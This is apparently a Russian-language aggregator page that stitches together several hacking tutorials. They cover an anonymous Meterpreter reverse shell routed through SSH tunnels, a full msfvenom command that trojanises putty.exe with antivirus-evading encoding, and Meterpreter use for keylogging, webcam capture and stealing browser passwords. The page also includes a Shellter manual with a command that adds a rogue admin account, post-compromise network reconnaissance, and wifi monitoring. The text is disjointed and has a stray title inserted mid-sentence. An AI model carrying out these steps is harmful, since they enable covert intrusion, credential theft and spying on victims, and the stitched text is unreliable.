Как узнать lhost kali linux

Обновлено: 05.07.2024

Всем привет! Эта статья рассчитана скорее на новичков, которые только начинают своё знакомство с Metasploit Framework, но уже кое-что понимают. Если вы считаете себя опытным специалистом и вас заинтересовало название, можете сразу перейти к TL;DR; в конце. Речь в этой статье пойдет о том, как устроить анонимный доступ к meterpriter оболочке посредством reverse tcp с использованием промежуточного сервера и SSH туннелей.

Дисклеймер: чукча не писатель, не безопасник и вообще с трудом может причислить себя к профессионалам в какой-либо сфере. Но чукча захотел reverse tcp через tor и сделал, а вам теперь это читать. А так же помните, что производить подобные действия можно только в разрешенных вам местах, иначе вам грозят несколько статей уголовного кодекса.

Вступление

Допустим, мы нашли дыру на виндовой машине и хотим на неё проникнуть. Рассмотрим варианты, причем обычный cmd нам неинтересен, то ли дело meterpreter, о нём и поговорим.

Есть два основных принципа соединения с оболочкой meterpreter: прямое и обратное. В meterpreter'е есть множество вариантов подключения, но в рамках этой статьи мы будем говорить только о bind tcp(прямой) и reverse tcp(обратный).

Какие подводные камни нас ждут, если мы хотим использовать bind tcp, открыв таким образом порт у жертвы и потом через прокси или тор подключиться? Во-первых, брэндмауэр жертвы поинтересуется, зачем эта непонятная программа пытается выйти в интернет и можно ли ей тут хозяйничать? Допустим, пользователь глуп(что скорее всего так и есть) настолько, чтобы разрешить нашей программе открыть порт, спросите себя, кто нынче выходит в интернет напрямую и имеет белый ip? Мало таких осталось, сейчас везде роутеры, а следовательно наш порт будет доступен только во внутренней сети. Если мы заморочились и прокинули порт наружу, то остаётся полследняя проблемы: нужно знать ip, чтобы подключиться, а он может периодически меняться. Зато, если все перечисленные выше условия выполнены, то можно подключиться через цепочку проксей из любого места.

Что насчет reverse tcp подключения? Брэндмауэр не ругается, роутер тоже не помеха — жертва сама подключится к нам, поэтому же отпадает необходимость следить за её ip адресом. Но возникает проблема посерьёзнее — анонимность. Нам нужно указать, куда жертва будет подключаться, то есть написать свой ip, который можно будет увидеть через тот же netstat. И тогда дяди в чистых костюмах или мстительная жертва с нужными знакомыми смогут, как говорится, вычислить по ip и начистить ботинки сами знаете что сделать. Ещё один минус — наш айпи должен быть постоянным, чтобы иметь возможность подключаться к жертве повторно.

Как же быть? Как сохранить анонимность и иметь возможность входа из любого места?

Начальные условия

Весь процесс я буду демонстрировать в следующих условиях:

  1. В качестве атакующей стороны будет выступать виртуальная машина Kali Linux 2 с IP адресом 192.168.1.50
  2. Жертвой будет виртуалка с Windows 7. IP — 192.168.1.146
  3. Промежуточным, читай — прокси, сервером будет Fedora с IP 192.168.1.10


Сообщаем, что на жертве у нас будет запущена полезная нагрузка meterpreter с обратным соединением:


Указываем параметры нагрузки — будем слушать на порту 4444 нашего ip адреса(почему не 127.0.0.1 расскажу позже).


Запускаем и оставляем в таком виде до лучших времен.

Создание exe с полезной нагрузкой

Затем сгенерируем программулину, которая и будет подключаться через прокси к нам. Открываем новую вкладку терминала и набираем следующее:


Кратко расскажу об аргументах.

Первые три очевидны — архитектура процессора, платформа и формат выходного файла. Аргумент -p сразу понятен тем, кто немного знаком с Metasploit: мы выбирали в качестве полезной нагрузки оболочку meterpreter, которая подключится на порт LPORT хоста LHOST, принадлежащие в данном случае нашему прокси-серверу.

Аваст не повелся и гордо сообщил об угрозе, поэтому и был убит на месте, дабы не мешать испытаниям. Файл на месте, теперь займемся подготовкой нашего сервера.

Настройка сервера

Мы будем использовать статический проброс портов.

Говорят, это дельце можно провернуть через SOCKS-прокси, но позвольте сначала рассказать, почему я так не сделал. Для тех кто не в курсе, поясню, что с помощью команды ssh -D 8181 user@192.168.1.10, можно открыть SOCKS-прокси на нашем сервере и воспользовавшись, например, proxychains проксировать все запросы через 192.168.1.10. У меня не получилось заставить metasploit работать через proxychains. То есть он вроде запускается через proxychains, но когда дело доходит на запуска хэндлера, слушать он начинает почему-то на моей машине, а не на прокси-сервере.

В созданном нами exe порт был 22222, а на Kali мы слушаем порт 4444. Значит-с, чтобы все запросы идущие на серверный порт 22222 транслировались на наш порт 4444, в Kali нужно написать такую команду:


Чтобы разобраться, почему это не сработает, поймем чего мы этой командой хотели добиться. Мне нравится, когда на экране есть информация о том, что происходит, поэтому я добавил -v, но доступ к оболочке нам не нужен, поэтому -N(ещё в этом случае нас не будет видно в who на сервере). Магический аргумент -R 127.0.0.1:22222:127.0.0.1:4444 описывает правила перенаправления пакетов: с адреса на сервере 127.0.0.1:22222 на наш локальный адрес 127.0.0.1:4444. Первый 127.0.0.1 подразумевается, поэтому мы его опускаем.

Нюанс в том, что по умолчанию проброшенный таким образом порт на сервере будет доступен только с серверного же localhost'а и при попытке подключиться извне ничего не произойдет и никаких ошибок не будет.

Поправим ситуацию — открываем на прокси-сервере конфиг ssh демона — /etc/ssh/sshd_config, ищем строку GatewayPorts, раскомментируем её и устанавливаем в yes. Переподгружаем конфиг через service sshd reload и теперь со спокойной душей запускаем команду.

А теперь интересный момент. Когда я только это всё изучал, то подобными манипуляциями у меня получилось добиться подключения жертвы к моему хэндлеру и успешно открыть командную строку метерпритера, но при вводе любой команды(даже help) он с дикими ошибками закрывал соединение. Сейчас же, когда я пишу статью, всё работает. Даже если у вас всё заработало и так, всё равно рекомендую к прочтению следующий абзац.

После долгих часов гугления был найден комментарий разработчика метерпритера о том, что не стоит указывать LHOST(то есть адрес хоста, на котором слушать) 127.0.0.1. Нужно писать либо что-то типа 127.0.0.2, либо 0.0.0.0. Но если мы выбираем первый вариант, то и прокидывать порты нужно на 127.0.0.2. Но и с таким вариантом у меня выпадали ошибки. После ещё более долгих часов гугления был найден комментарий другого разработчика, который сказал чуть больше: нельзя вешать не только на 127.0.0.1, но и в принципе на интерфейс loopback, потому что он зарезервирован и работать будет не стабильно, и порекомендовал вешать хэндлер на другой сетевой интерфейс, например eth0. Так что прокидывать мы будем на него же. Команда приобретает следующий вид:

Говорят, proxychains, входящий в стандартную сборку Kali 2 уже староват и давно заброшен. У меня он периодически падал с ошибкой segfault. Поэтому я поставил себе proxychains4(proxychains-ng) отсюда, а старый снёс к чертям и остался доволен, чего и вам советую.


Заметьте, что мы подключаемся именно на 127.0.0.1:42022, а не на 192.168.1.10:22. Всё готово! Выпускайте Кракена Запускаем HarmlessFile.exe у жертвы и наслаждаемся результатом.

Используем левый сервер в качестве прокси, к которому будет цепляться meterpreter жертвы с помощью reverse tcp.

    Запускаем handler в metasploit'e с метерпритером в качестве нагрузки и указываем адрес левого сервера:

Оговорюсь повторно, что я описал метод, который сработал для меня и выполнил нужную мне задачу — анонимность и мобильной. Может быть есть и другие, более простые пути добиться того же самого, но мне не удалось их раскопать.

Моя первая статья на ваш суд — конструктивная критика приветствуется, об опечатках прошу сообщать в личку.

Полезные ссылки:

Памятка пользователям ssh — замечательное описание возможностей SSH, в частности о SSH-туннелях.
Meterpreter базовые команды — описание базовых команд Meterpreter'a.

И ещё 2 слегка устаревшие статьи, но в них есть описание более интересных фич Meterpreter.

Привет. Начну с того, что применять данную информацию против кого-либо, с кем вы не договорились заранее и не получили разрешение(желательно в письменном виде с подписью) - незаконно. Все действия лежат только на ваших плечах и совести. Вся информация предоставлена в ознакомительных целях. Иначе за вами выедут.

Начнём. Возможно, это Часть 1.

Если вы заглянули сюда - значит вы чуточку знаете, что такое Kali Linux и metasploit framework. Если нет, то:

Kali Linux — GNU/Linux-LiveCD, возникший как результат слияния WHAX и Auditor Security Collection. Проект создали Мати Ахарони (Mati Aharoni) и Макс Мозер (Max Moser). Предназначен прежде всего для проведения тестов на безопасность.

Metasploit Framework — удобная платформа для создания и отладки эксплойтов. Кроме того, проект включает в себя базу опкодов, архив шеллкодов и информацию по исследованиям компьютерной безопасности.

Хакер: Kali Linux 2017.1

Жертва: Windows 10 1703 x64

Для начала нам нужно, чтобы наш заражённый файл был запущен на компе/ноутбуке жертвы. Как вы это будете делать - без понятия. Я буду применять свой комп, а Кали у меня на ноуте.

Процесс создания заражённого файла:

1. Внезапно нам нужен файл. В моём примере будет putty, хотя можно юзануть и exe какого-нибудь хрома, например, и потом заражённый файл вернуть на место взамен оригинального. Вы ничего не видели и не знаете

2. Переходим в папку с файлом, либо будем писать полный путь до файла, что не круто.

3. Пишем msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.0.101 -e x86/shikata_ga_nai -i 5 -b "\x00" -f exe -o putty3.exe

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Поясню, что тут есть:

msfvenom - собсно, создатель троянов/инжектор троянов в .exe

-a x86 - архитектура x86. Для x86 приложений

-x putty.exe - файл, который мы заражаем

-k - Без понятия, вот как в оригинале: Preserve the template behavior and inject the payload as a new thread. Что-то типа "встроить нагрузку"

-p windows/meterpreter/reverse_tcp - "полезная нагрузка"

lhost=192.168.0.101 - ip атакующего

-e x86/shikata_ga_nai - шифрование, чтоб антивирусы не палили

-i 5 - количество итераций шифрования. У меня 5.

-b "\x00" - что-то связанное с "плохими символами(bad-chars)"

-f exe - формат файла

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

У меня тут 10 итераций(-i 10).

Данный файл любым методом переносится на комп жертвы и запускается или удаляется антивирусом сразу после переноса

35/64, но для тестов сгодится. Если шифровать разными шифрованиями тыщу раз, то будет меньше палева.

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Запускаем metasploit framework и ждём.

Нас встретит "msf >"

Команды выглядят так:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > show options (показывает, что можно настроить)

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Пишем "set LHOST 192.168.0.101", в моём случае. У вас, ясное дело, ваш ip Kali Linux.

LHOST и LPORT должны быть теми, которые мы указали в msfvenom.

Подразумевается, что жертва уже запустила файл и у нас есть доступ. Иначе просто не откроется сессия.

Заражённая программа внешне ничем не отличается от оригинала:

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Обычная программа. Только закрывается через несколько секунд.

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

На ноуте в это время пишем exploit и видим это:

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Если вы напишете сначала на кириллице, а потом сотрёте и напишете как надо - всё равно символ останется и выдаст ошибку, что у меня и произошло. Странный баг, но забавный. Иногда бесячий.

"meterpreter > " означает, что мы в системе и можем делать что угодно, но перед этим надо перекинуть "заражённый процесс в другой процесс". Чтобы путти мог закрыться и не закрыл вместе с собой сессию.

Пишем ps и видим список процессов. Надо выбрать тот, который закрывать не будут. Например, проводник, который именуется explorer.exe

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

PID у него 3044. 2800 это PPID и он нам не нужен.

пишем "migrate 3044" и готово.

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

5412 - прошлый PID. Если закрыть putty - закроется и соединение. После миграции в explorer.exe Путти может спокойно закрыться и соединение не пропадёт.

Мы в системе. Начинается самое интересное. Сверху текст, снизу картинка. Как и везде.

Возможности meterpreter.

Пойдём от простого к интересному. Некоторую дичь затрагивать не буду. Она интересна, вероятно, каким-то редким людям и в некоторых случаях.

1. help. Выдаст возможные команды, но далеко не все. Даже показывать не буду, там крайне мало инфы.

2. sysinfo. и так понятно, что даёт

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

3. getsystem - должно дать права админа, но на Win10 не работает

4. getuid - узнать имя компа

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

5. screenshot - делает снимок экрана жертвы в нативном разрешении монитора жертвы. Куда сохраняет - написано. Скриншот в скриншоте.

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

6. Команды для вебкамеры:

webcam_list - список вебкамер у жертвы

webcam_snap - делает снимок на камеру

webcam_stream - вебка в прямом эфире

Не смогу показать, нет вебкамеры и вряд-ли теперь будет.

7. record_mic - записывает с микрофона, но у меня сразу же останавливает. Наверное, особенности Win10 и того, что не получилось ввести getsystem.

keyscan_start - включает кейлоггер

keyscan_dump - показывает, что напечатали

keyscan_stop - выключает кейлоггер

Ловит только английские буквы

ololoo, test keylogger

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

9. uictl [enable/disable] Как узнать lhost kali linux - должно включать/выключать клаву/мышь/и то и другое, но на Win10 не сработало. На Win7 работало.

Неинтересное закончилось, пора переходить к интересному:

Команды вида "run *что-то*". Они уже более интересные. Тут уже нет порядка крутости, тут всё годно. Может быть, когда-нибудь, я проверю все команды и сделаю пост на пикабу. Прям такой "тру обзор", но это не точно.

Чтобы посмотреть все доступные команды - пишем "run " и жмём Таб два раза. Нас спросят "хотите ли вы вывести всё на экран?" а там 200+ позиций. Жмём "y", потом пробел несколько раз, отмотав до конца и видим примерно это:

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Всё я показывать не буду, там очень много. Пост не резиновый.

Ах да, иногда может писать, что скрипт не поддерживается в meterpreter. Это дубликаты другого скрипта, который там напишут.

1. run post/windows/manage/enable_rdp - должно включать rdp, но "insufficient privileges", потому что getsystem не работает. Вероятно, в других Виндах заработает.

2. run post/windows/gather/enum_chrome и /enum_firefox - уносит данные из этих браузеров. В т.ч. и пароли. На этапе "Preferences" задумывается, но не зависает. Сохраняет в /root/.msf4/loot и удаляет при закрытии MSF.

Открыть можно через SQLite Database Browser, который есть в том же Кали, хоть это и текстовый документ. Надо только в программе выбрать "All files".

Файлы Preference и Decrypted открываются в текстовом редакторе.

Про дубликаты: там есть "run enum_chrome", но MSF пожалуется, что он недоступен в этой версии и скажет "юзайте run post/windows/gather/enum_chrome". Если что-то не работает - читайте, что предлагает MSF.

Что же можно там узнать?

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.2. Историю скачивания файлов

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.3. Историю ссылок скачивания файлов

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.4. Гуглопоиск, видимо

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.5. Историю посещения сайтов

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.7. Логины/пароли/сайты, куда подходят логины и пароли

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.9. Телефоны в автозаполнении(если повезёт)

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.10. Адреса в автозаполнении(если повезёт)

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

На этом пока всё, надо сделать базу к следующему посту и проверить ещё больше вещей в том списке. Вторая часть будет завтра, скорее всего. Но это не точно.

Список инструментов для тестирования на проникновение и их описание

Описание shellter

Shellter — это динамический инструмент инъекции шелл-кода, и первый когда-либо созданный по-настоящему динамический PE инфектор. Он может использоваться для внедрения шелл-кода в нативные приложения Windows (в настоящий момент только 32-битные приложения). Шелл-код может быть чем-то вашим или чем-то сгенерированным программными платформами, такими как Metasploit.

Автор: Kyriakos Economou

Справка по shellter

Опции командной строки

Справка: -h, --help

Действие: Показывает информацию об опциях командной строки.

Список полезных нагрузок: --list

Действие: Показывает список встроенных полезных нагрузок.

Режим вербальности: -v

Действие: Показывает трассировку в реальном времени.

Режим работы: -a / -m

Действие: Установить используемый Режим работы.

-a: Автоматический режим, -m: Ручной режим. (смотрите примечания)

Помните: Ддя ручного режима требуется взаимодействие с пользователем для всех параметров.

Онлайн проверка версии: --VersionCheck

Действие: Получает информацию о версии с официального сайта.

Помните: требует Интернет-подключения. Не доступно в режиме Wine.

PE цель: -f <имя файла>

Действие: Устанавливает PE цель.

Невидимый режим: -s / --stealth

Действие: Включает функцию невидимого режима. Сохраняет исходную функциональность зараженного файла PE.

Помните: Если эта функция включена, то --enc, --encode и --handler IAT подразумеваются как установленные.

Полезная нагрузка: -p <имя файла>/<указанная полезная нагрузка>

Действие: Устанавливает полезную нагрузку. Должна быть в формате RAW.

Metasploit: генерирует -t raw.

Следующие полезные нагрузки могут использоваться напрямую через Shellter.

Полезные нагрузки

LHOST: --lhost <IP адрес>/<доменное имя>

Действие: Устанавливает IP адрес или доменное имя для внедряемой полезной нагрузки для использования обратного соединения.

Порт: --port <Port number>

Действие: Устанавливает номер порта для включённых полезных нагрузках, которые используют или обратное соединение или прослушивают локально на входящие содеинения.

Команда: --cmd <cmd argument>

Действие: Устанавливает команду.

Пример: -p winexec --cmd "cmd.exe /c net user evil password /ADD"

Включение поддержки DLL Reflective Loader: --reflective <FuncName>

Действие: Помечает полезную нагрузку как DLL и устанавливает функцию reflective loader.

Этот флаг автоматически активирует поддержку кодированной полезной нагрузки, поскольку загрузчик должен требовать разрешения RW для себя. Вам нужно будет также установить аргумент --handler.

Помните: имена функций чувствительны к регистру.

Трассировка потоков: --trace main / all

Действие: Устанавливает прослеживаемые потоки.

main: главный поток, all: трасировка всех потоков.

Помните: рекомендуется включить трассировку всех потоков. Это включено по умолчанию когда используется автоматический режим без аргументов командной строки.

Включение поддержки кодированной полезной нагрузки: --enc

Действие: Регулирует закодированными полезными нагрузками.

Помните: усли вы используете кодированную полезную нагрузку, этот флаг является обязательным! Однако он включен по умолчанию, когда используется автоматический режим без аргументов командной строки. Рекомендуется всегда использовать кодированные полезные нагрузки, если они не являются полностью кастомными и поэтому не известными AV.

Помните: вы можете включить в Shellter кодировщик используя аргумент --encode. Он также может использоваться поверх уже закодированных полезных нагрузок.

Собственная кодировка Shellter: --encode / --encode

Действие: Применяет дополнительный уровень кодирования.

Он включён по умолчанию когда используется автоматический режим без аргументов командной строки.

Поддерживаемые операторы кодирования

Примечания: количество заданных операторов должно быть между 1 и 12 операторами.

Если вы просто используете переключатель --encode без определения пользовательской последовательности операторов кодирования, Shellter сам случайным образом создаст и применит схему кодирования.

Помните: вам также нужно установить аргумент --handler.

Если вы установили переключатель --encode, тогда --enc подразумевается как установленный.

Кодирование с использованием Dynamic Thread Context Key: --DTCK

Действие: Кодирует полезную нагрузку, используя динамическую контекстную информацию потока.

Помните: это экспериментальная функция, которая ведёт журнал содержимого некоторых регистров CPU и затем фильтрует все эти данные, чтобы сохранить расположения инъекции где по крайней мере один из журналируемых регистров имеет значение, которое может надёжно использоваться для кодирования и последующего раскодирования полезной нагрузки во время выполнения.

Помните: если вы установили этот флаг, то --encode и --enc подразумеваются как тоже установленные.

В автоматическом режиме эта функция может быть активирована только использованием аргументов командной строки.

Обфускация проприетарным декодером: --polyDecoder

Действие: Обфусцирует генерируемое декодером Shellter с использованием Thread Context Aware Polymorphic code.

Помните: это применимо только если была установлена опция --encode. Это включено по умолчанию когда используется автоматический режим без аргументов командной строки.

Encoded Payload Handling Type: --handler iat / section

Действие: Определяет, как будет обрабатываться кодированная полезная нагрузка.

iat: Использовать указатели IAT, section: Дать секции RWE разрешения.

Помните: если вы используете кодированную полезную нагрузку, этот флаг является обязательным! Тем не менее, когда вы используете автоматический режим без аргументов командной строки, это включается по умолчанию.

Обфусцировать обработчик IAT типа: --polyIAT

Действие: включает обфускацию обработчиков IAT типа для кодированных полезных нагрузок используя Thread Context Aware Polymorphic code.

Помните: делает вывод намного более полиморфным. Это включено по умолчанию, когда используется автоматический режим без аргументов командной строки.

Создать и связать PolyMorphic Junk Code: --junk

Действие: Включает PolyMorphic Junk Code.

Помните: рекомендуется включать эту опцию чтобы создавать более сложный вывод. Этот тип добавленного кода также служит для тайм-аута некоторых эмуляторов и песочниц. Возможно, вам придется подождать несколько секунд, прежде чем полезная нагрузка будет выполнена.

Помните: эта функция включена по умолчанию, когда используется автоматический режим без аргументов командной строки.

Руководство по shellter

Примеры запуска shellter

Установка shellter

Установка в Kali Linux

shellter — это приложение для Windows. Поэтому для его запуска в Kali Linux необходимо установить Wine, это делается следующими командами:

Установка пакета shellter:

Установка в BlackArch

Информация об установке в другие операционные системы будет добавлена позже.

В этом уроке мы изучим основы работы с сетью и научимся находить информацию о сети, такую как наш ip адрес, шлюз сервер и так далее.

Мы научимся определять, какие сервисы запущены на нашей машине.

После взлома линукс сервера, вам нужно выяснить, есть ли у него другие сетевые интерфейсы, и если они есть, то, как правило, это означает, что этот сервер подключен к двум различным сетям, и его можно использовать, чтобы попасть в другую сеть или другой сегмент сети. В корпоративной сети разделение сетей, в которых находится чувствительная информация, чувствительные серверы, является частой практикой.

Также вам нужно знать, с какими dns серверами общается взломанный сервер, и через какой шлюз. В этом случае вы будете лучше понимать, в какой сети находитесь.

Итак, при подключении к сети нас интересует несколько моментов, а именно, какие используются сетевые интерфейсы (проводная сеть, беспроводная сеть, vpn-сеть). Какой у нас ip адрес, шлюз, и по какому маршруту идет наш трафик.

В линуксе сетевые интерфейсы называются следующим образом. Кстати, если вы не знаете что такое сетевой интерфейс, на самом деле это то, каким способом ваш компьютер подключен к сети. Если ваш компьютер подключен к сети через сетевой кабель, то оборудование, через которое он выходит в сеть, называется сетевым адаптером. У сетевого адаптера есть интерфейс с ip адресом, и если это проводная сеть, то интерфейс называется eth0. Это справедливо, если в вашей сети всего один адаптер. Если есть и другие, то они будут называться eth1, eth2 и т. д. Если у вас используется беспроводная сеть, то интерфейс называется wlan0. Lo — это лупбэк адрес, также известный как com или localhost. Его ip адрес 127.0.0.1. Лупбэк адресу всегда соответсвует этот ip адрес.

Переходим в Kali Linux. Чтобы узнать свой ip адрес, то используем команду ifconfig. Как видите тут указан мой ip адрес:

ip адрес kali linux

Допустим, мне нужно указать мой dns сервер, и если вы забыли или не знаете что такое dns сервер, то поищите эту информацию в интернете. Думаю ответ не заставит вас долго ждать.

nslookup timcore.ru

traceroute timcore.ru

Для остановки данной команды, используйте комбинацию клавиш Ctrl+C.

Когда вы взломали сервер, нужно знать, какие сервисы на нем запущены, а также какие компьютеры или сервера общаются с этими сервисами. Это можно сделать с помощью команды netstat. Как правило с ней используются опции -a — отображает все запущенные сервисы, -n — это адрес с цифрами. -t — отображает tcp, то есть протокол tcp. -p — отображает название программы, которая запустила этот сервис. Попробуйте эту команду самостоятельно.

Kali linux: мониторинг сетевых карт и сканирование сети

1. Мониторинг сетевой карты:

Kali не поддерживает встроенную сетевую карту, поддерживает только сетевую карту usb. Виртуальная машина, которую я использую. Сначала откройте соединение USB-сетевой карты на съемном устройстве виртуальной машины и выполните команду ifconfig следующим образом:


Интерфейс eth0 - это информация о локальной проводной сетевой карте, интерфейс lo - это информация об интерфейсе локального адреса обратной петли, а wlan0 - это информация о вставленной сетевой карте usb.

Примечание. Если вы не видите интерфейс, подобный wlan, это означает, что сетевая карта не активирована. выполненныйifconfig -aКоманда для просмотра всех интерфейсов. Когда вы видите имя интерфейса wlan, это означает, что сетевая карта успешно идентифицирована. Выполните команду активации:ifconfig wlan0 upПосле выполнения указанной выше команды выходной информации нет. отifconfigКоманда подтверждает успешную активацию.

Запустите режим мониторинга сетевой карты: airmon-ng start wlan0


Здесь вы можете видеть, что режим STA отключен, и новый интерфейс waln0mon создан в качестве режима монитора.



До и после kali2.0 обработка здесь разная. Мы используем 2.0, здесь нам нужно добавить виртуальный интерфейс wlan0.

iw phy phy0 interface add wlan0 type managed

Это необходимо для добавления интерфейса wlan0 на phy0 (phy0 получается из журнала, из которого ранее был запущен мониторинг сетевой карты), и режим управляется.


На этом этапе установлен режим мониторинга.

Во-вторых, просканируйте диапазон сети

команда:airodump-ng wlan0mon


> BSSID: Mac-адрес беспроводной точки доступа.

> PWR: отчет об уровне сигнала, полученный от драйвера сетевой карты.

> Маяки: номер объявления, выданный беспроводной точкой доступа.

> CH: номер канала.

> МБ: максимальная скорость, поддерживаемая беспроводной точкой доступа. Если MB = 11, это 802.11b; если MB = 22, это 802.11b +; если выше, это 802.11g. Последний пункт (после 54) указывает, что короткая преамбула поддерживается. e означает, что в сети включен QoS (802.11e).

> ENC: Используемая система алгоритмов шифрования. OPN означает отсутствие шифрования. WEP? Это означает, что WEP или WPA / WPA2, WEP (без вопросительного знака) означает статический или динамический WEP. Если появляется TKIP или CCMP, значит это WPA / WPA2.

> CIPHER: Обнаруженный алгоритм шифрования, один из CCMP, WRAAP, TKIP, WEP, WEP104.

> AUTH: используемый протокол аутентификации. Обычно используются MGT (WPA / WPA2 использует независимые серверы аутентификации, такие как 802.1x, radius, eap и т. Д.), SKA (общий ключ WEP), PSK (общий ключ WPA / WPA2) или OPN (открытый WEP. ).

> СТАНЦИЯ: Mac-адрес клиента, включая подключенного клиента и клиента, который хочет найти беспроводное соединение. Если клиент не подключен, он будет отображаться как не связанный под BSSID.

> Скорость: представляет скорость передачи.

> Потерянные: пакеты данных потеряны за последние десять секунд на основе определения серийного номера.

> Кадры: количество пакетов данных, отправленных клиентом.

> Зонд: ESSID зондировал клиент. Если клиент пытается подключиться к AP, но не подключен, он будет отображаться здесь.

Конкретная конфигурация не будет повторяться. Следует отметить, что после запуска службы нет определенных ресурсов пакета и их необходимо добавить. Введите интерфейс беспроводной сетевой карты wlan0mon в Intf, другие конфигурации можно игнорировать. После выхода из службы файлы журнала по умолчанию сохраняются в каталоге / root /. Здесь можно просмотреть 5 файлов журнала. Формат файла следующий:

> gpsxml: если используется источник GPS, здесь хранятся связанные с ним данные GPS.

> nettxt: Включает всю собранную информацию о выходе файла.

> netxml: включает все данные в формате XML.

> pcapdump: Включает пакеты данных, захваченные за весь сеанс.

3. Приложение

1. синтаксис airmon-ng:airmon-ng <start|stop> <interface> [channel]

> start: указывает, что беспроводная сетевая карта запущена в режиме мониторинга.

> stop: Указывает на отключение режима мониторинга беспроводной сетевой карты.

> интерфейс: укажите имя интерфейса беспроводной сетевой карты.

> канал: укажите канал при запуске беспроводной сетевой карты в режим мониторинга.

2. синтаксис airodump-ng:airodump-ng [параметры] <интерфейс>

> -c: укажите рабочий канал целевой точки доступа.

> -w: укажите имя файла, который вы хотите сохранить для сохранения пакета данных.

Читайте также: